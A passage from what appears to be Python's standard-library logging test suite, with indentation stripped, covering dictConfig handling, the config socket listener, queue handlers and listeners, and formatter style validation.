"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
